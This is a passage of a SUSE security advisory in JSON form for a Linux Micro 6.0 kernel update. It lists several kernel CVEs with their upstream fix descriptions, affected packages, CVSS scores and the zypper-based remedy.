"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68351",
"url": "https://www.suse.com/security/cve/CVE-2025-68351"
},
{
"category": "external",
"summary": "SUSE Bug 1255567 for CVE-2025-68351",
"url": "https://bugzilla.suse.com/1255567"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68351"
},
{
"cve": "CVE-2025-68354",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68354"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nregulator: core: Protect regulator_supply_alias_list with regulator_list_mutex\n\nregulator_supply_alias_list was accessed without any locking in\nregulator_supply_alias(), regulator_register_supply_alias(), and\nregulator_unregister_supply_alias(). Concurrent registration,\nunregistration and lookups can race, leading to:\n\n1 use-after-free if an alias entry is removed while being read,\n2 duplicate entries when two threads register the same alias,\n3 inconsistent alias mappings observed by consumers.\n\nProtect all traversals, insertions and deletions on\nregulator_supply_alias_list with the existing regulator_list_mutex.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68354",
"url": "https://www.suse.com/security/cve/CVE-2025-68354"
},
{
"category": "external",
"summary": "SUSE Bug 1255553 for CVE-2025-68354",
"url": "https://bugzilla.suse.com/1255553"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68354"
},
{
"cve": "CVE-2025-68362",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68362"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl818x: rtl8187: Fix potential buffer underflow in rtl8187_rx_cb()\n\nThe rtl8187_rx_cb() calculates the rx descriptor header address\nby subtracting its size from the skb tail pointer.\nHowever, it does not validate if the received packet\n(skb-\u003elen from urb-\u003eactual_length) is large enough to contain this\nheader.\n\nIf a truncated packet is received, this will lead to a buffer\nunderflow, reading memory before the start of the skb data area,\nand causing a kernel panic.\n\nAdd length checks for both rtl8187 and rtl8187b descriptor headers\nbefore attempting to access them, dropping the packet cleanly if the\ncheck fails.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68362",
"url": "https://www.suse.com/security/cve/CVE-2025-68362"
},
{
"category": "external",
"summary": "SUSE Bug 1255611 for CVE-2025-68362",
"url": "https://bugzilla.suse.com/1255611"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68362"
},
{
"cve": "CVE-2025-68363",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68363"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Check skb-\u003etransport_header is set in bpf_skb_check_mtu\n\nThe bpf_skb_check_mtu helper needs to use skb-\u003etransport_header when\nthe BPF_MTU_CHK_SEGS flag is used:\n\n\tbpf_skb_check_mtu(skb, ifindex, \u0026mtu_len, 0, BPF_MTU_CHK_SEGS)\n\nThe transport_header is not always set. There is a WARN_ON_ONCE\nreport when CONFIG_DEBUG_NET is enabled + skb-\u003egso_size is set +\nbpf_prog_test_run is used:\n\nWARNING: CPU: 1 PID: 2216 at ./include/linux/skbuff.h:3071\n skb_gso_validate_network_len\n bpf_skb_check_mtu\n bpf_prog_3920e25740a41171_tc_chk_segs_flag # A test in the next patch\n bpf_test_run\n bpf_prog_test_run_skb\n\nFor a normal ingress skb (not test_run), skb_reset_transport_header\nis performed but there is plan to avoid setting it as described in\ncommit 2170a1f09148 (\"net: no longer reset transport_header in __netif_receive_skb_core()\").\n\nThis patch fixes the bpf helper by checking\nskb_transport_header_was_set(). The check is done just before\nskb-\u003etransport_header is used, to avoid breaking the existing bpf prog.\nThe WARN_ON_ONCE is limited to bpf_prog_test_run, so targeting bpf-next.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68363",
"url": "https://www.suse.com/security/cve/CVE-2025-68363"
},
{
"category": "external",
"summary": "SUSE Bug 1255552 for CVE-2025-68363",
"url": "https://bugzilla.suse.com/1255552"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68363"
},
{
"cve": "CVE-2025-68365",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68365"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nfs/ntfs3: Initialize allocated memory before use\n\nKMSAN reports: Multiple uninitialized values detected:\n\n- KMSAN: uninit-value in ntfs_read_hdr (3)\n- KMSAN: uninit-value in bcmp (3)\n\nMemory is allocated by __getname(), which is a wrapper for\nkmem_cache_alloc(). This memory is used before being properly\ncleared. Change kmem_cache_alloc() to kmem_cache_zalloc() to\nproperly allocate and clear memory before use.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68365",
"url": "https://www.suse.com/security/cve/CVE-2025-68365"
},
{
"category": "external",
"summary": "SUSE Bug 1255548 for CVE-2025-68365",
"url": "https://bugzilla.suse.com/1255548"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68365"
},
{
"cve": "CVE-2025-68366",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68366"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnbd: defer config unlock in nbd_genl_connect\n\nThere is one use-after-free warning when running NBD_CMD_CONNECT and\nNBD_CLEAR_SOCK:\n\nnbd_genl_connect\n nbd_alloc_and_init_config // config_refs=1\n nbd_start_device // config_refs=2\n set NBD_RT_HAS_CONFIG_REF\t\t\topen nbd // config_refs=3\n recv_work done // config_refs=2\n\t\t\t\t\t\tNBD_CLEAR_SOCK // config_refs=1\n\t\t\t\t\t\tclose nbd // config_refs=0\n refcount_inc -\u003e uaf\n\n------------[ cut here ]------------\nrefcount_t: addition on 0; use-after-free.\nWARNING: CPU: 24 PID: 1014 at lib/refcount.c:25 refcount_warn_saturate+0x12e/0x290\n nbd_genl_connect+0x16d0/0x1ab0\n genl_family_rcv_msg_doit+0x1f3/0x310\n genl_rcv_msg+0x44a/0x790\n\nThe issue can be easily reproduced by adding a small delay before\nrefcount_inc(\u0026nbd-\u003econfig_refs) in nbd_genl_connect():\n\n mutex_unlock(\u0026nbd-\u003econfig_lock);\n if (!ret) {\n set_bit(NBD_RT_HAS_CONFIG_REF, \u0026config-\u003eruntime_flags);\n+ printk(\"before sleep\\n\");\n+ mdelay(5 * 1000);\n+ printk(\"after sleep\\n\");\n refcount_inc(\u0026nbd-\u003econfig_refs);\n nbd_connect_reply(info, nbd-\u003eindex);\n }",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68366",
"url": "https://www.suse.com/security/cve/CVE-2025-68366"
},
{
"category": "external",
"summary": "SUSE Bug 1255622 for CVE-2025-68366",
"url": "https://bugzilla.suse.com/1255622"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-68366"
},
{
"cve": "CVE-2025-68367",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68367"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmacintosh/mac_hid: fix race condition in mac_hid_toggle_emumouse\n\nThe following warning appears when running syzkaller, and this issue also\nexists in the mainline code.\n\n ------------[ cut here ]------------\n list_add double add: new=ffffffffa57eee28, prev=ffffffffa57eee28, next=ffffffffa5e63100.\n WARNING: CPU: 0 PID: 1491 at lib/list_debug.c:35 __list_add_valid_or_report+0xf7/0x130\n Modules linked in:\n CPU: 0 PID: 1491 Comm: syz.1.28 Not tainted 6.6.0+ #3\n Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.16.0-0-gd239552ce722-prebuilt.qemu.org 04/01/2014\n RIP: 0010:__list_add_valid_or_report+0xf7/0x130\n RSP: 0018:ff1100010dfb7b78 EFLAGS: 00010282\n RAX: 0000000000000000 RBX: ffffffffa57eee18 RCX: ffffffff97fc9817\n RDX: 0000000000040000 RSI: ffa0000002383000 RDI: 0000000000000001\n RBP: ffffffffa57eee28 R08: 0000000000000001 R09: ffe21c0021bf6f2c\n R10: 0000000000000001 R11: 6464615f7473696c R12: ffffffffa5e63100\n R13: ffffffffa57eee28 R14: ffffffffa57eee28 R15: ff1100010dfb7d48\n FS: 00007fb14398b640(0000) GS:ff11000119600000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 0000000000000000 CR3: 000000010d096005 CR4: 0000000000773ef0\n DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n PKRU: 80000000\n Call Trace:\n \u003cTASK\u003e\n input_register_handler+0xb3/0x210\n mac_hid_start_emulation+0x1c5/0x290\n mac_hid_toggle_emumouse+0x20a/0x240\n proc_sys_call_handler+0x4c2/0x6e0\n new_sync_write+0x1b1/0x2d0\n vfs_write+0x709/0x950\n ksys_write+0x12a/0x250\n do_syscall_64+0x5a/0x110\n entry_SYSCALL_64_after_hwframe+0x78/0xe2\n\nThe WARNING occurs when two processes concurrently write to the mac-hid\nemulation sysctl, causing a race condition in mac_hid_toggle_emumouse().\nBoth processes read old_val=0, then both try to register the input handler,\nleading to a double list_add of the same handler.\n\n CPU0 CPU1\n ------------------------- -------------------------\n vfs_write() //write 1 vfs_write() //write 1\n proc_sys_write() proc_sys_write()\n mac_hid_toggle_emumouse() mac_hid_toggle_emumouse()\n old_val = *valp // old_val=0\n old_val = *valp // old_val=0\n mutex_lock_killable()\n proc_dointvec() // *valp=1\n mac_hid_start_emulation()\n input_register_handler()\n mutex_unlock()\n mutex_lock_killable()\n proc_dointvec()\n mac_hid_start_emulation()\n input_register_handler() //Trigger Warning\n mutex_unlock()\n\nFix this by moving the old_val read inside the mutex lock region.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68367",
"url": "https://www.suse.com/security/cve/CVE-2025-68367"
},
{
"category": "external",
"summary": "SUSE Bug 1255547 for CVE-2025-68367",
"url": "https://bugzilla.suse.com/1255547"
}
],
"remediations": [
{
"category": "vendor_fix",
